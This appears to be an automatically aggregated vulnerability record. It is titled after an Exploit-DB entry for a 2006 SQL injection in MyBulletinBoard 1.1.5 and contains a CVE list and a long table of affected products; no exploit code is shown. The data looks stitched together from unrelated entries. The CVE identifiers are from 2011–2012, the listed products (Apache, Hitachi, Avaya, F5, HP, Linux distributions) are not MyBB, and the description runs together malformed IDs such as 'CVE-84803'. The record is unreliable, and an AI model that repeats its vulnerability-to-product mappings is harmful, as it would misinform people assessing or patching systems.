ID

VAR-E-200607-0733


CVE

cve_id:CVE-2011-5035

Trust: 1.0

cve_id:CVE-2011-5034

Trust: 1.0

cve_id:CVE-2011-4885

Trust: 1.0

cve_id:CVE-2011-4858

Trust: 1.0

cve_id:CVE-2011-4084

Trust: 1.0

cve_id:CVE-2006-3775

Trust: 1.0

cve_id:CVE-2012-0053

Trust: 0.8

cve_id:CVE-2011-3368

Trust: 0.3

sources: BID: 51706 // BID: 49957 // PACKETSTORM: 109284 // EXPLOIT-DB: 2012

EDB ID

2012


TITLE

MyBulletinBoard (MyBB) 1.1.5 - 'CLIENT-IP' SQL Injection - PHP webapps Exploit

Trust: 1.0

sources: EXPLOIT-DB: 2012

DESCRIPTION

MyBulletinBoard (MyBB) 1.1.5 - 'CLIENT-IP' SQL Injection. CVE-84803CVE-2011-5035CVE-2011-5034CVE-2011-4885CVE-2011-4858CVE-2011-4084CVE-2006-3775CVE-84802CVE-78115CVE-78114CVE-78113CVE-78112CVE-27335 . webapps exploit for PHP platform

Trust: 1.0

sources: EXPLOIT-DB: 2012

AFFECTED PRODUCTS

vendor:hitachimodel:web serverscope:eqversion:02-03

Trust: 1.8

vendor:hitachimodel:web server 02-04-/ascope: - version: -

Trust: 1.5

vendor:hitachimodel:web serverscope:eqversion:02-02

Trust: 1.2

vendor:hitachimodel:web serverscope:eqversion:02-01

Trust: 1.2

vendor:avayamodel:voice portalscope:eqversion:5.1

Trust: 1.2

vendor:mybulletinboardmodel: - scope:eqversion:1.1.5

Trust: 1.0

vendor:hpmodel:system management homepagescope:eqversion:6.2

Trust: 0.9

vendor:hitachimodel:web server 01-02-/cscope: - version: -

Trust: 0.9

vendor:hitachimodel:web server 01-02-/bscope: - version: -

Trust: 0.9

vendor:hitachimodel:web server 01-02-/ascope: - version: -

Trust: 0.9

vendor:ubuntumodel:linux lts sparcscope:eqversion:8.04

Trust: 0.6

vendor:ubuntumodel:linux lts powerpcscope:eqversion:8.04

Trust: 0.6

vendor:ubuntumodel:linux lts lpiascope:eqversion:8.04

Trust: 0.6

vendor:ubuntumodel:linux lts i386scope:eqversion:8.04

Trust: 0.6

vendor:ubuntumodel:linux lts amd64scope:eqversion:8.04

Trust: 0.6

vendor:ubuntumodel:linux i386scope:eqversion:11.10

Trust: 0.6

vendor:ubuntumodel:linux amd64scope:eqversion:11.10

Trust: 0.6

vendor:ubuntumodel:linux powerpcscope:eqversion:11.04

Trust: 0.6

vendor:ubuntumodel:linux i386scope:eqversion:11.04

Trust: 0.6

vendor:ubuntumodel:linux armscope:eqversion:11.04

Trust: 0.6

vendor:ubuntumodel:linux amd64scope:eqversion:11.04

Trust: 0.6

vendor:ubuntumodel:linux powerpcscope:eqversion:10.10

Trust: 0.6

vendor:ubuntumodel:linux i386scope:eqversion:10.10

Trust: 0.6

vendor:ubuntumodel:linux armscope:eqversion:10.10

Trust: 0.6

vendor:ubuntumodel:linux amd64scope:eqversion:10.10

Trust: 0.6

vendor:ubuntumodel:linux sparcscope:eqversion:10.04

Trust: 0.6

vendor:ubuntumodel:linux powerpcscope:eqversion:10.04

Trust: 0.6

vendor:ubuntumodel:linux i386scope:eqversion:10.04

Trust: 0.6

vendor:ubuntumodel:linux armscope:eqversion:10.04

Trust: 0.6

vendor:ubuntumodel:linux amd64scope:eqversion:10.04

Trust: 0.6

vendor:slackwaremodel:linux x86 64 -currentscope: - version: -

Trust: 0.6

vendor:slackwaremodel:linux x86 64scope:eqversion:13.37

Trust: 0.6

vendor:slackwaremodel:linuxscope:eqversion:13.37

Trust: 0.6

vendor:slackwaremodel:linux x86 64scope:eqversion:13.1

Trust: 0.6

vendor:slackwaremodel:linuxscope:eqversion:13.1

Trust: 0.6

vendor:slackwaremodel:linux x86 64scope:eqversion:13.0

Trust: 0.6

vendor:slackwaremodel:linuxscope:eqversion:13.0

Trust: 0.6

vendor:slackwaremodel:linuxscope:eqversion:12.2

Trust: 0.6

vendor:slackwaremodel:linuxscope:eqversion:12.1

Trust: 0.6

vendor:slackwaremodel:linuxscope:eqversion:12.0

Trust: 0.6

vendor:slackwaremodel:linux -currentscope: - version: -

Trust: 0.6

vendor:redhatmodel:enterprise linux desktop workstation clientscope:eqversion:5

Trust: 0.6

vendor:oraclemodel:enterprise linuxscope:eqversion:6

Trust: 0.6

vendor:oraclemodel:enterprise linuxscope:eqversion:5

Trust: 0.6

vendor:mandrivamodel:linux mandrake x86 64scope:eqversion:2011

Trust: 0.6

vendor:mandrivamodel:linux mandrakescope:eqversion:2011

Trust: 0.6

vendor:mandrivamodel:linux mandrake x86 64scope:eqversion:2010.1

Trust: 0.6

vendor:mandrivamodel:linux mandrakescope:eqversion:2010.1

Trust: 0.6

vendor:mandrakesoftmodel:enterprise server x86 64scope:eqversion:5

Trust: 0.6

vendor:mandrakesoftmodel:enterprise serverscope:eqversion:5

Trust: 0.6

vendor:hpmodel:system management homepagescope:eqversion:6.3

Trust: 0.6

vendor:hpmodel:system management homepagescope:eqversion:6.1

Trust: 0.6

vendor:hpmodel:system management homepagescope:eqversion:6.0

Trust: 0.6

vendor:hitachimodel:web server linuxscope:eqversion:04-00

Trust: 0.6

vendor:hitachimodel:web server linuxscope:eqversion:03-00

Trust: 0.6

vendor:hitachimodel:web server hp-uxscope:eqversion:03-00

Trust: 0.6

vendor:hitachimodel:web server 02-04-/bscope: - version: -

Trust: 0.6

vendor:hitachimodel:web serverscope:eqversion:02-04

Trust: 0.6

vendor:hitachimodel:web serverscope:eqversion:01-02

Trust: 0.6

vendor:gentoomodel:linuxscope: - version: -

Trust: 0.6

vendor:fujitsumodel:interstage studio standard-j editionscope:eqversion:9.2

Trust: 0.6

vendor:fujitsumodel:interstage studio standard-j editionscope:eqversion:9.1

Trust: 0.6

vendor:fujitsumodel:interstage studio standard-j editionscope:eqversion:9.0

Trust: 0.6

vendor:fujitsumodel:interstage studio standard-j editionscope:eqversion:8.0.1

Trust: 0.6

vendor:fujitsumodel:interstage studio standard-j edition bscope:eqversion:9.1.0

Trust: 0.6

vendor:fujitsumodel:interstage studio enterprise editionscope:eqversion:9.2

Trust: 0.6

vendor:fujitsumodel:interstage studio enterprise editionscope:eqversion:9.1

Trust: 0.6

vendor:fujitsumodel:interstage studio enterprise editionscope:eqversion:9.0

Trust: 0.6

vendor:fujitsumodel:interstage studio enterprise editionscope:eqversion:8.0.1

Trust: 0.6

vendor:fujitsumodel:interstage studio enterprise edition bscope:eqversion:9.1.0

Trust: 0.6

vendor:fujitsumodel:interstage job workload serverscope:eqversion:8.1

Trust: 0.6

vendor:fujitsumodel:interstage business application server enterprisescope:eqversion:8.0.0

Trust: 0.6

vendor:fujitsumodel:interstage apworks modelers-j editionscope:eqversion:7.0

Trust: 0.6

vendor:fujitsumodel:interstage apworks modelers-j edition 6.0ascope: - version: -

Trust: 0.6

vendor:fujitsumodel:interstage apworks modelers-j editionscope:eqversion:6.0

Trust: 0.6

vendor:fujitsumodel:interstage application server enterprise editionscope:eqversion:9.2

Trust: 0.6

vendor:fujitsumodel:interstage application server enterprise edition ascope:eqversion:9.0

Trust: 0.6

vendor:fujitsumodel:interstage application server enterprise editionscope:eqversion:9.0

Trust: 0.6

vendor:fujitsumodel:interstage application server enterprise editionscope:eqversion:8.0.2

Trust: 0.6

vendor:fujitsumodel:interstage application server enterprise editionscope:eqversion:8.0.1

Trust: 0.6

vendor:fujitsumodel:interstage application server enterprise editionscope:eqversion:7.0.1

Trust: 0.6

vendor:fujitsumodel:interstage application server enterprise editionscope:eqversion:7.0

Trust: 0.6

vendor:fujitsumodel:interstage application server enterprise editionscope:eqversion:6.0

Trust: 0.6

vendor:fujitsumodel:interstage application server enterprise editionscope:eqversion:5.0

Trust: 0.6

vendor:debianmodel:linux sparcscope:eqversion:6.0

Trust: 0.6

vendor:debianmodel:linux s/390scope:eqversion:6.0

Trust: 0.6

vendor:debianmodel:linux powerpcscope:eqversion:6.0

Trust: 0.6

vendor:debianmodel:linux mipsscope:eqversion:6.0

Trust: 0.6

vendor:debianmodel:linux ia-64scope:eqversion:6.0

Trust: 0.6

vendor:debianmodel:linux ia-32scope:eqversion:6.0

Trust: 0.6

vendor:debianmodel:linux armscope:eqversion:6.0

Trust: 0.6

vendor:debianmodel:linux amd64scope:eqversion:6.0

Trust: 0.6

vendor:avayamodel:voice portalscope:eqversion:5.1.2

Trust: 0.6

vendor:avayamodel:voice portalscope:eqversion:5.1.1

Trust: 0.6

vendor:avayamodel:voice portal sp1scope:eqversion:5.1

Trust: 0.6

vendor:avayamodel:voice portal sp2scope:eqversion:5.0

Trust: 0.6

vendor:avayamodel:voice portal sp1scope:eqversion:5.0

Trust: 0.6

vendor:avayamodel:voice portalscope:eqversion:5.0

Trust: 0.6

vendor:avayamodel:ip office application serverscope:eqversion:8.0

Trust: 0.6

vendor:avayamodel:ip office application serverscope:eqversion:7.0

Trust: 0.6

vendor:avayamodel:ip office application serverscope:eqversion:6.1

Trust: 0.6

vendor:avayamodel:ip office application serverscope:eqversion:6.0

Trust: 0.6

vendor:avayamodel:aura session managerscope:eqversion:6.1.3

Trust: 0.6

vendor:avayamodel:aura session managerscope:eqversion:6.1.2

Trust: 0.6

vendor:avayamodel:aura session managerscope:eqversion:6.1.1

Trust: 0.6

vendor:avayamodel:aura session manager sp2scope:eqversion:6.1

Trust: 0.6

vendor:avayamodel:aura session manager sp1scope:eqversion:6.1

Trust: 0.6

vendor:avayamodel:aura session managerscope:eqversion:6.1

Trust: 0.6

vendor:avayamodel:aura session manager sp1scope:eqversion:6.0

Trust: 0.6

vendor:avayamodel:aura session managerscope:eqversion:6.0

Trust: 0.6

vendor:avayamodel:aura session manager sp2scope:eqversion:5.2

Trust: 0.6

vendor:avayamodel:aura session manager sp1scope:eqversion:5.2

Trust: 0.6

vendor:avayamodel:aura session managerscope:eqversion:5.2

Trust: 0.6

vendor:avayamodel:aura session managerscope:eqversion:1.1

Trust: 0.6

vendor:avayamodel:aura session managerscope:eqversion:1.0

Trust: 0.6

vendor:avayamodel:aura messagingscope:eqversion:6.0.1

Trust: 0.6

vendor:avayamodel:aura messagingscope:eqversion:6.0

Trust: 0.6

vendor:avayamodel:aura experience portalscope:eqversion:6.0

Trust: 0.6

vendor:avayamodel:aura communication manager utility servicesscope:eqversion:6.2

Trust: 0.6

vendor:avayamodel:aura communication manager utility servicesscope:eqversion:6.1

Trust: 0.6

vendor:avayamodel:aura communication manager utility servicesscope:eqversion:6.0

Trust: 0.6

vendor:avayamodel:aura communication managerscope:eqversion:6.0.1

Trust: 0.6

vendor:avayamodel:aura communication managerscope:eqversion:6.0

Trust: 0.6

vendor:avayamodel:aura application enablement servicesscope:eqversion:5.2.1

Trust: 0.6

vendor:avayamodel:aura application enablement servicesscope:eqversion:6.1.1

Trust: 0.6

vendor:avayamodel:aura application enablement servicesscope:eqversion:6.1

Trust: 0.6

vendor:avayamodel:aura application enablement servicesscope:eqversion:5.2.3

Trust: 0.6

vendor:avayamodel:aura application enablement servicesscope:eqversion:5.2.2

Trust: 0.6

vendor:avayamodel:aura application enablement servicesscope:eqversion:5.2

Trust: 0.6

vendor:applemodel:mac os serverscope:eqversion:x10.7.3

Trust: 0.6

vendor:applemodel:mac os serverscope:eqversion:x10.7.2

Trust: 0.6

vendor:applemodel:mac os serverscope:eqversion:x10.7.1

Trust: 0.6

vendor:applemodel:mac os serverscope:eqversion:x10.7

Trust: 0.6

vendor:applemodel:mac os serverscope:eqversion:x10.6.8

Trust: 0.6

vendor:applemodel:mac osscope:eqversion:x10.7.4

Trust: 0.6

vendor:applemodel:mac osscope:eqversion:x10.7.3

Trust: 0.6

vendor:applemodel:mac osscope:eqversion:x10.7.2

Trust: 0.6

vendor:applemodel:mac osscope:eqversion:x10.7.1

Trust: 0.6

vendor:avayamodel:aura communication managerscope:eqversion:4.0

Trust: 0.6

vendor:apachemodel:software foundation apachescope:eqversion:2.2

Trust: 0.6

vendor:apachemodel:software foundation apachescope:eqversion:1.3

Trust: 0.6

vendor:apachemodel:protocol.c cookiescope: - version: -

Trust: 0.5

vendor:xeroxmodel:freeflow print server 73.c0.41scope: - version: -

Trust: 0.3

vendor:xeroxmodel:freeflow print server 73.b3.61scope: - version: -

Trust: 0.3

vendor:susemodel:linux enterprise server for vmware sp1scope:eqversion:11

Trust: 0.3

vendor:susemodel:linux enterprise server sp1scope:eqversion:11

Trust: 0.3

vendor:susemodel:linux enterprise server sp4scope:eqversion:10

Trust: 0.3

vendor:susemodel:linux enterprise sdk sp1scope:eqversion:11

Trust: 0.3

vendor:susemodel:linux enterprise sdk sp4scope:eqversion:10

Trust: 0.3

vendor:sophosmodel:web appliancescope:eqversion:3.8.1

Trust: 0.3

vendor:sophosmodel:web appliancescope:eqversion:3.8.0

Trust: 0.3

vendor:sophosmodel:web appliancescope:eqversion:3.7.9

Trust: 0.3

vendor:redhatmodel:jboss enterprise web server for rhelscope:eqversion:61.0

Trust: 0.3

vendor:redhatmodel:jboss enterprise web server for rhel serverscope:eqversion:51.0

Trust: 0.3

vendor:redhatmodel:enterprise linux workstationscope:eqversion:6

Trust: 0.3

vendor:redhatmodel:enterprise linux serverscope:eqversion:6

Trust: 0.3

vendor:redhatmodel:enterprise linux hpc node optionalscope:eqversion:6

Trust: 0.3

vendor:redhatmodel:enterprise linux hpc nodescope:eqversion:6

Trust: 0.3

vendor:redhatmodel:enterprise linux desktop optionalscope:eqversion:6

Trust: 0.3

vendor:redhatmodel:enterprise linux desktopscope:eqversion:6

Trust: 0.3

vendor:redhatmodel:enterprise linux desktop clientscope:eqversion:5

Trust: 0.3

vendor:redhatmodel:enterprise linux serverscope:eqversion:5

Trust: 0.3

vendor:oraclemodel:enterprise linuxscope:eqversion:6.2

Trust: 0.3

vendor:junipermodel:nsmexpressscope:eqversion: -

Trust: 0.3

vendor:junipermodel:nsm3000scope:eqversion: -

Trust: 0.3

vendor:junipermodel:network and security manager softwarescope:eqversion:2012.2-

Trust: 0.3

vendor:junipermodel:junos spacescope:eqversion:12.3

Trust: 0.3

vendor:junipermodel:junos spacescope:eqversion:12.2

Trust: 0.3

vendor:junipermodel:junos spacescope:eqversion:12.1

Trust: 0.3

vendor:junipermodel:junos spacescope:eqversion:11.3

Trust: 0.3

vendor:junipermodel:junos spacescope:eqversion:11.2

Trust: 0.3

vendor:junipermodel:junos spacescope:eqversion:11.1

Trust: 0.3

vendor:ibmmodel:storwize unifiedscope:eqversion:v70001.3.20

Trust: 0.3

vendor:ibmmodel:storwize unifiedscope:eqversion:v70001.3.1.0

Trust: 0.3

vendor:ibmmodel:storwize unifiedscope:eqversion:v70001.3.0.5

Trust: 0.3

vendor:ibmmodel:storwize unifiedscope:eqversion:v70001.3.0.0

Trust: 0.3

vendor:hpmodel:xp provisioning managerscope:eqversion:5.0.0-00

Trust: 0.3

vendor:hpmodel:xp p9000 command view advanced editionscope:eqversion:7.4.0-00

Trust: 0.3

vendor:hpmodel:xp p9000 command view advanced editionscope:eqversion:7.3.1-00

Trust: 0.3

vendor:hpmodel:system management homepagescope:eqversion:7.1

Trust: 0.3

vendor:hpmodel:system management homepagescope:eqversion:7.0

Trust: 0.3

vendor:hpmodel:p9000 tiered storage managerscope:eqversion:5.0.0-00

Trust: 0.3

vendor:hpmodel:p9000 replication monitorscope:eqversion:6.0.0-00

Trust: 0.3

vendor:hpmodel:p9000 replication monitorscope:eqversion:5.0.0-00

Trust: 0.3

vendor:hpmodel:p9000 replication managerscope:eqversion:6.0.0-00

Trust: 0.3

vendor:hpmodel:onboard administratorscope:eqversion:3.55

Trust: 0.3

vendor:hpmodel:onboard administratorscope:eqversion:3.50

Trust: 0.3

vendor:hpmodel:hp-ux b.11.31scope: - version: -

Trust: 0.3

vendor:hpmodel:hp-ux b.11.11scope: - version: -

Trust: 0.3

vendor:hitachimodel:web server windowsscope:eqversion:04-10-03(x64)

Trust: 0.3

vendor:hitachimodel:web server windowsscope:eqversion:04-10-01(x64)

Trust: 0.3

vendor:hitachimodel:web server windowsscope:eqversion:03-00-060

Trust: 0.3

vendor:hitachimodel:web server security enhancement 02-04-/bscope:eqversion: -

Trust: 0.3

vendor:hitachimodel:web server windowsscope:eqversion:04-10-03

Trust: 0.3

vendor:hitachimodel:web server hp-uxscope:eqversion:04-10-02

Trust: 0.3

vendor:hitachimodel:web server hp-uxscope:eqversion:04-10-01

Trust: 0.3

vendor:hitachimodel:web server windowsscope:eqversion:04-10

Trust: 0.3

vendor:hitachimodel:web server windowsscope:eqversion:04-00-05

Trust: 0.3

vendor:hitachimodel:web server hp-uxscope:eqversion:04-00-04

Trust: 0.3

vendor:hitachimodel:web server solarisscope:eqversion:04-00-01

Trust: 0.3

vendor:hitachimodel:web server windowsscope:eqversion:04-00

Trust: 0.3

vendor:hitachimodel:web server hp-uxscope:eqversion:04-00

Trust: 0.3

vendor:hitachimodel:web server aixscope:eqversion:04-00

Trust: 0.3

vendor:hitachimodel:web server windowsscope:eqversion:03-10-10

Trust: 0.3

vendor:hitachimodel:web server hp-uxscope:eqversion:03-10-09

Trust: 0.3

vendor:hitachimodel:web server windowsscope:eqversion:03-10

Trust: 0.3

vendor:hitachimodel:web server hp-uxscope:eqversion:03-10

Trust: 0.3

vendor:hitachimodel:web server hp-uxscope:eqversion:03-00-05

Trust: 0.3

vendor:hitachimodel:web serverscope:eqversion:03-00-02

Trust: 0.3

vendor:hitachimodel:web server hp-uxscope:eqversion:03-00-01

Trust: 0.3

vendor:hitachimodel:web serverscope:eqversion:03-00-01

Trust: 0.3

vendor:hitachimodel:web server windowsscope:eqversion:03-00

Trust: 0.3

vendor:hitachimodel:web server solarisscope:eqversion:03-00

Trust: 0.3

vendor:hitachimodel:web server aixscope:eqversion:03-00

Trust: 0.3

vendor:hitachimodel:web serverscope:eqversion:02-05

Trust: 0.3

vendor:hitachimodel:web server 02-04-/cscope: - version: -

Trust: 0.3

vendor:hitachimodel:web server 02-04-/a (windows(ipscope: - version: -

Trust: 0.3

vendor:hitachimodel:web server )scope:eqversion:02-04

Trust: 0.3

vendor:hitachimodel:web server )scope:eqversion:02-03

Trust: 0.3

vendor:hitachimodel:web server 01-02-/dscope: - version: -

Trust: 0.3

vendor:hitachimodel:cosminexus developer no versionscope:eqversion:0

Trust: 0.3

vendor:hitachimodel:cosminexus application server no versionscope:eqversion:0

Trust: 0.3

vendor:hitachimodel:cosminexusscope:eqversion:9.0

Trust: 0.3

vendor:hitachimodel:cosminexusscope:eqversion:8.0

Trust: 0.3

vendor:hitachimodel:cosminexusscope:eqversion:7.0

Trust: 0.3

vendor:hitachimodel:cosminexusscope:eqversion:6.0

Trust: 0.3

vendor:hitachimodel:cosminexusscope:eqversion:5.0

Trust: 0.3

vendor:fujitsumodel:interstage studio standard-j editionscope:eqversion:10.0

Trust: 0.3

vendor:fujitsumodel:interstage studio enterprise editionscope:eqversion:10.0

Trust: 0.3

vendor:fujitsumodel:interstage application server standard-j editionscope:eqversion:9.3.1

Trust: 0.3

vendor:fujitsumodel:interstage application server enterprise editionscope:eqversion:10.0

Trust: 0.3

vendor:f5model:firepassscope:eqversion:7.0

Trust: 0.3

vendor:f5model:firepassscope:eqversion:6.1

Trust: 0.3

vendor:f5model:enterprise managerscope:eqversion:2.3

Trust: 0.3

vendor:f5model:enterprise managerscope:eqversion:2.1

Trust: 0.3

vendor:f5model:big-ip womscope:eqversion:11.0

Trust: 0.3

vendor:f5model:big-ip womscope:eqversion:10.2.4

Trust: 0.3

vendor:f5model:big-ip womscope:eqversion:10.2.2

Trust: 0.3

vendor:f5model:big-ip womscope:eqversion:10.2.1

Trust: 0.3

vendor:f5model:big-ip womscope:eqversion:10.0

Trust: 0.3

vendor:f5model:big-ip womscope:eqversion:11.1.0

Trust: 0.3

vendor:f5model:big-ip wom hf1scope:eqversion:10.2.1

Trust: 0.3

vendor:f5model:big-ip webacceleratorscope:eqversion:11.1

Trust: 0.3

vendor:f5model:big-ip webacceleratorscope:eqversion:11.0

Trust: 0.3

vendor:f5model:big-ip webacceleratorscope:eqversion:10.2.4

Trust: 0.3

vendor:f5model:big-ip webacceleratorscope:eqversion:10.2.1

Trust: 0.3

vendor:f5model:big-ip webacceleratorscope:eqversion:10.0

Trust: 0.3

vendor:f5model:big-ip webaccelerator hf1scope:eqversion:10.2.1

Trust: 0.3

vendor:f5model:big-ip psmscope:eqversion:11.1

Trust: 0.3

vendor:f5model:big-ip psmscope:eqversion:11.0

Trust: 0.3

vendor:f5model:big-ip psmscope:eqversion:10.2.4

Trust: 0.3

vendor:f5model:big-ip psmscope:eqversion:10.2.1

Trust: 0.3

vendor:f5model:big-ip psmscope:eqversion:10.0

Trust: 0.3

vendor:f5model:big-ip psm hf1scope:eqversion:10.2.1

Trust: 0.3

vendor:f5model:big-ip ltmscope:eqversion:11.0

Trust: 0.3

vendor:f5model:big-ip ltmscope:eqversion:10.2.4

Trust: 0.3

vendor:f5model:big-ip ltmscope:eqversion:10.2.2

Trust: 0.3

vendor:f5model:big-ip ltmscope:eqversion:10.0

Trust: 0.3

vendor:f5model:big-ip ltmscope:eqversion:11.1.0

Trust: 0.3

vendor:f5model:big-ip ltm hf1scope:eqversion:10.2.1

Trust: 0.3

vendor:f5model:big-ip ltmscope:eqversion:10.2.1

Trust: 0.3

vendor:f5model:big-ip link controllerscope:eqversion:11.1

Trust: 0.3

vendor:f5model:big-ip link controllerscope:eqversion:11.0

Trust: 0.3

vendor:f5model:big-ip link controllerscope:eqversion:10.2.4

Trust: 0.3

vendor:f5model:big-ip link controllerscope:eqversion:10.2.2

Trust: 0.3

vendor:f5model:big-ip link controllerscope:eqversion:10.2.1

Trust: 0.3

vendor:f5model:big-ip link controllerscope:eqversion:10.0

Trust: 0.3

vendor:f5model:big-ip link controller hf1scope:eqversion:10.2.1

Trust: 0.3

vendor:f5model:big-ip gtmscope:eqversion:11.0

Trust: 0.3

vendor:f5model:big-ip gtmscope:eqversion:10.2.4

Trust: 0.3

vendor:f5model:big-ip gtmscope:eqversion:10.2.2

Trust: 0.3

vendor:f5model:big-ip gtmscope:eqversion:10.2.1

Trust: 0.3

vendor:f5model:big-ip gtmscope:eqversion:10.0

Trust: 0.3

vendor:f5model:big-ip gtmscope:eqversion:11.1.0

Trust: 0.3

vendor:f5model:big-ip gtm hf1scope:eqversion:10.2.1

Trust: 0.3

vendor:f5model:big-ip edge gatewayscope:eqversion:11.1

Trust: 0.3

vendor:f5model:big-ip edge gatewayscope:eqversion:11.0

Trust: 0.3

vendor:f5model:big-ip edge gatewayscope:eqversion:10.2.4

Trust: 0.3

vendor:f5model:big-ip edge gatewayscope:eqversion:10.2.2

Trust: 0.3

vendor:f5model:big-ip edge gatewayscope:eqversion:10.2.1

Trust: 0.3

vendor:f5model:big-ip edge gateway hf1scope:eqversion:10.2.1

Trust: 0.3

vendor:f5model:big-ip edge gatewayscope:eqversion:10.1

Trust: 0.3

vendor:f5model:big-ip asmscope:eqversion:11.0.00

Trust: 0.3

vendor:f5model:big-ip asmscope:eqversion:10.2.40

Trust: 0.3

vendor:f5model:big-ip asmscope:eqversion:10.0.00

Trust: 0.3

vendor:f5model:big-ip asmscope:eqversion:10.2.2

Trust: 0.3

vendor:f5model:big-ip asmscope:eqversion:10.2.1

Trust: 0.3

vendor:f5model:big-ip asmscope:eqversion:11.1.0

Trust: 0.3

vendor:f5model:big-ip asm hf1scope:eqversion:10.2.1

Trust: 0.3

vendor:f5model:big-ip apmscope:eqversion:11.0

Trust: 0.3

vendor:f5model:big-ip apmscope:eqversion:10.2.4

Trust: 0.3

vendor:f5model:big-ip apmscope:eqversion:10.2.2

Trust: 0.3

vendor:f5model:big-ip apmscope:eqversion:11.1.0

Trust: 0.3

vendor:f5model:big-ip apm hf1scope:eqversion:10.2.1

Trust: 0.3

vendor:f5model:big-ip apmscope:eqversion:10.2.1

Trust: 0.3

vendor:f5model:big-ip apmscope:eqversion:10.1

Trust: 0.3

vendor:f5model:big-ip analyticsscope:eqversion:11.1.0

Trust: 0.3

vendor:f5model:big-ip analytics 11.0.0-hf2scope: - version: -

Trust: 0.3

vendor:f5model:big-ip analyticsscope:eqversion:11.0.0

Trust: 0.3

vendor:f5model:arxscope:eqversion:6.4

Trust: 0.3

vendor:f5model:arxscope:eqversion:6.3

Trust: 0.3

vendor:f5model:arxscope:eqversion:6.2

Trust: 0.3

vendor:f5model:arxscope:eqversion:6.1.1

Trust: 0.3

vendor:f5model:arxscope:eqversion:6.1

Trust: 0.3

vendor:f5model:arxscope:eqversion:6.0

Trust: 0.3

vendor:avayamodel:aura messagingscope:eqversion:6.1

Trust: 0.3

vendor:applemodel:mac os serverscope:eqversion:x10.7.5

Trust: 0.3

vendor:applemodel:mac osscope:eqversion:x10.7

Trust: 0.3

vendor:applemodel:mac osscope:eqversion:x10.6.8

Trust: 0.3

vendor:apachemodel:apachescope:eqversion:2.2.15

Trust: 0.3

vendor:apachemodel:apachescope:eqversion:2.2.14

Trust: 0.3

vendor:apachemodel:apachescope:eqversion:2.2.13

Trust: 0.3

vendor:apachemodel:apachescope:eqversion:2.2.12

Trust: 0.3

vendor:apachemodel:apachescope:eqversion:2.2.11

Trust: 0.3

vendor:apachemodel:apachescope:eqversion:2.2.10

Trust: 0.3

vendor:apachemodel:apachescope:eqversion:2.2.9

Trust: 0.3

vendor:apachemodel:apachescope:eqversion:2.2.8

Trust: 0.3

vendor:apachemodel:apachescope:eqversion:2.2.6

Trust: 0.3

vendor:apachemodel:apachescope:eqversion:2.2.5

Trust: 0.3

vendor:apachemodel:apachescope:eqversion:2.2.4

Trust: 0.3

vendor:apachemodel:apachescope:eqversion:2.2.3

Trust: 0.3

vendor:apachemodel:apachescope:eqversion:2.2.2

Trust: 0.3

vendor:apachemodel:apachescope:eqversion:2.2

Trust: 0.3

vendor:apachemodel:apachescope:eqversion:2.0.63

Trust: 0.3

vendor:apachemodel:apachescope:eqversion:2.0.61

Trust: 0.3

vendor:apachemodel:apachescope:eqversion:2.0.60

Trust: 0.3

vendor:apachemodel:apachescope:eqversion:2.0.59

Trust: 0.3

vendor:apachemodel:apachescope:eqversion:2.0.58

Trust: 0.3

vendor:apachemodel:apachescope:eqversion:2.0.57

Trust: 0.3

vendor:apachemodel:apachescope:eqversion:2.0.56

Trust: 0.3

vendor:apachemodel:apachescope:eqversion:2.0.55

Trust: 0.3

vendor:apachemodel:apachescope:eqversion:2.0.54

Trust: 0.3

vendor:apachemodel:apachescope:eqversion:2.0.53

Trust: 0.3

vendor:apachemodel:apachescope:eqversion:2.0.52

Trust: 0.3

vendor:apachemodel:apachescope:eqversion:2.0.51

Trust: 0.3

vendor:apachemodel:apachescope:eqversion:2.0.50

Trust: 0.3

vendor:apachemodel:apachescope:eqversion:2.0.49

Trust: 0.3

vendor:apachemodel:apachescope:eqversion:2.0.48

Trust: 0.3

vendor:apachemodel:apachescope:eqversion:2.0.47

Trust: 0.3

vendor:apachemodel:apachescope:eqversion:2.0.46

Trust: 0.3

vendor:apachemodel:apachescope:eqversion:2.0.45

Trust: 0.3

vendor:apachemodel:apachescope:eqversion:2.0.44

Trust: 0.3

vendor:apachemodel:apachescope:eqversion:2.0.43

Trust: 0.3

vendor:apachemodel:apachescope:eqversion:2.0.42

Trust: 0.3

vendor:apachemodel:apachescope:eqversion:2.0.41

Trust: 0.3

vendor:apachemodel:apachescope:eqversion:2.0.40

Trust: 0.3

vendor:apachemodel:apachescope:eqversion:2.0.39

Trust: 0.3

vendor:apachemodel:apachescope:eqversion:2.0.38

Trust: 0.3

vendor:apachemodel:apachescope:eqversion:2.0.37

Trust: 0.3

vendor:apachemodel:apachescope:eqversion:2.0.36

Trust: 0.3

vendor:apachemodel:apachescope:eqversion:2.0.35

Trust: 0.3

vendor:apachemodel:apachescope:eqversion:2.0.32

Trust: 0.3

vendor:apachemodel:apachescope:eqversion:2.0.28

Trust: 0.3

vendor:apachemodel:apachescope:eqversion:2.2.21

Trust: 0.3

vendor:apachemodel:apachescope:eqversion:2.2.20

Trust: 0.3

vendor:apachemodel:apachescope:eqversion:2.2.19

Trust: 0.3

vendor:apachemodel:apachescope:eqversion:2.2.18

Trust: 0.3

vendor:apachemodel:apachescope:eqversion:2.2.17

Trust: 0.3

vendor:apachemodel:apachescope:eqversion:2.2.16

Trust: 0.3

vendor:apachemodel:apachescope:eqversion:2.0.64

Trust: 0.3

vendor:sophosmodel:web appliancescope:neversion:3.8.1.1

Trust: 0.3

vendor:sophosmodel:web appliancescope:neversion:3.7.9.1

Trust: 0.3

vendor:junipermodel:nsm appliance generic offline for centosscope:neversion:51

Trust: 0.3

vendor:junipermodel:junos space 13.1r1.6scope:neversion: -

Trust: 0.3

vendor:ibmmodel:storwize unifiedscope:neversion:v70001.40

Trust: 0.3

vendor:ibmmodel:storwize unifiedscope:neversion:v70001.3.23

Trust: 0.3

vendor:hpmodel:xp provisioning managerscope:neversion:7.0.0-00

Trust: 0.3

vendor:hpmodel:xp p9000 command view advanced editionscope:neversion:7.4.1-00

Trust: 0.3

vendor:hpmodel:system management homepagescope:neversion:7.1.1

Trust: 0.3

vendor:hpmodel:p9000 tiered storage managerscope:neversion:7.4.1-00

Trust: 0.3

vendor:hpmodel:p9000 replication managerscope:neversion:7.4.1-00

Trust: 0.3

vendor:hpmodel:onboard administratorscope:neversion:3.56

Trust: 0.3

vendor:applemodel:mac osscope:neversion:x10.8.2

Trust: 0.3

vendor:applemodel:mac osscope:neversion:x10.7.5

Trust: 0.3

vendor:apachemodel:2.2.22-devscope:neversion: -

Trust: 0.3

vendor:apachemodel:apachescope:neversion:2.0.65

Trust: 0.3

vendor:redhatmodel:enterprise linux wsscope:eqversion:4

Trust: 0.3

vendor:redhatmodel:enterprise linux esscope:eqversion:4

Trust: 0.3

